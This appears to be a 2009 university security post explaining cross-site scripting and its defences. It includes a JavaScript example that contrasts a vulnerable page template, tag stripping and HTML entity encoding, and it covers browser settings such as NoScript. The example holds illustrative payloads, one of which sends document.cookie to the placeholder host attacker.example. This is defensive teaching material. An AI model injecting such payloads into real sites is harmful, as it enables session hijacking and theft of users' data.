ISU Information Security

What is XSS?

Wednesday, July 29, 2009 14:45

XSS, or Cross-Site Scripting, is an attack on the web browser delivered through a web application. Typically the attacker gets script injected into a page served by a victim web site, either reflected back from a crafted link or stored in the site's own data, and the viewer's browser runs that script as if it were the site's own, with the same access to the site's cookies and page content. As of 2007 cross-site scripting had become the most prevalent form of web-based attack.

Cross-site scripting attacks encompass a variety of attack types against the user's browser. The typical goal is to gain access to a user's personal data held at the targeted web site, most often by stealing the session cookie so that the attacker can act as that user.

Defense
Web application developers can mitigate XSS attacks through code review, by encoding untrusted data for the HTML context in which it is output rather than trying to filter out "bad" tags, and by staying abreast of known attack vectors through sites like SANS' Internet Storm Center.
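The injection described above and the developer-side fix, as an added example that is not part of the original post or of any ISU code. It builds a small search-results page three ways: concatenating the query straight into the HTML (vulnerable), stripping script tags (a common but insufficient fix), and HTML-entity encoding the query (the fix). The function names, the two payloads and the attacker host attacker.example are assumptions constructed for this illustration.

```javascript
// Added example: reflected XSS in a page template, beside the encoded version.
// Names, payloads and the attacker host are assumptions for this illustration.

// Constructed attacker input, of the kind a victim is lured into following
// in a link such as search?q=<script>...</script>. Once it runs inside the
// site's page it can read the site's cookies and send them off-site.
const PAYLOAD_SCRIPT =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Constructed payload that needs no <script> element at all, so a filter
// that only removes script tags lets it through.
const PAYLOAD_EVENT = '<img src=x onerror="alert(document.cookie)">';

// Vulnerable: the untrusted query is concatenated straight into the markup.
// The browser cannot tell the attacker's tags from the site's own.
function renderSearchVulnerable(query) {
  return '<h1>Results for ' + query + '</h1>';
}

// Insufficient fix: remove <script> elements and pass the rest through.
function stripScriptTags(untrusted) {
  return String(untrusted).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

function renderSearchStripped(query) {
  return '<h1>Results for ' + stripScriptTags(query) + '</h1>';
}

// The fix: HTML-entity encode the five characters that can change the
// parser's state inside element text or a quoted attribute value.
// (Data placed inside a <script> block or a URL needs a different encoder.)
function escapeHtml(untrusted) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSearchSafe(query) {
  return '<h1>Results for ' + escapeHtml(query) + '</h1>';
}

// Demonstration check: after removing the template's own <h1> wrapper,
// does any tag remain that must have come from the untrusted input?
function containsTag(html) {
  const body = html.replace(/^<h1>|<\/h1>$/g, '');
  return /<\/?[a-z][^>]*>/i.test(body);
}

// Stand-alone run: show which renderer lets attacker markup survive.
for (const [name, payload] of [['script', PAYLOAD_SCRIPT], ['event', PAYLOAD_EVENT]]) {
  console.log(name, 'vulnerable:', containsTag(renderSearchVulnerable(payload)));
  console.log(name, 'stripped:  ', containsTag(renderSearchStripped(payload)));
  console.log(name, 'encoded:   ', containsTag(renderSearchSafe(payload)));
}
```

The point of the middle renderer is that tag stripping is a denylist: it catches the obvious `<script>` payload and misses the event-handler one. Entity encoding makes no judgement about which input is bad; it simply guarantees that whatever the user typed is rendered as text in the HTML context it lands in, which is why code review should look for every place untrusted data reaches the page and confirm the right encoder is applied there.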

Web users can defend against XSS attacks by disabling scripting in the web browser and allowing only selected sites to run scripts. Disabling scripting outright breaks many sites that depend on JavaScript, so an allow-list of trusted sites is the more practical approach.

Firefox users can download the NoScript add-on, which allows the user to selectively allow scripting via a whitelist. NoScript also includes an anti-XSS component which remains active even if script blocking is disabled. NoScript can be installed through the Firefox add-on tool.

Safari users can purchase PithHelmet, an ad-blocking plugin for Safari which includes script controls.

IE users can disable scripting from the Tools menu:

In IE 7-8:

  1. From the Tools menu select "Internet Options".
  2. Click the "Security" tab.
  3. Click "Custom Level".
  4. Scroll down to the Scripting section and set "Active scripting" to "Disable".

A browser restart will be needed. The setting applies per security zone, so sites you trust can be added to the Trusted sites zone, which keeps its own scripting setting, rather than re-enabling scripting for the whole Internet zone.

Links
Enabling and Disabling Javascript in Web Browsers
Wikipedia – Cross Site Scripting
VirtualForge – How XSS works (flash movies)
The Cross-Site Scripting FAQ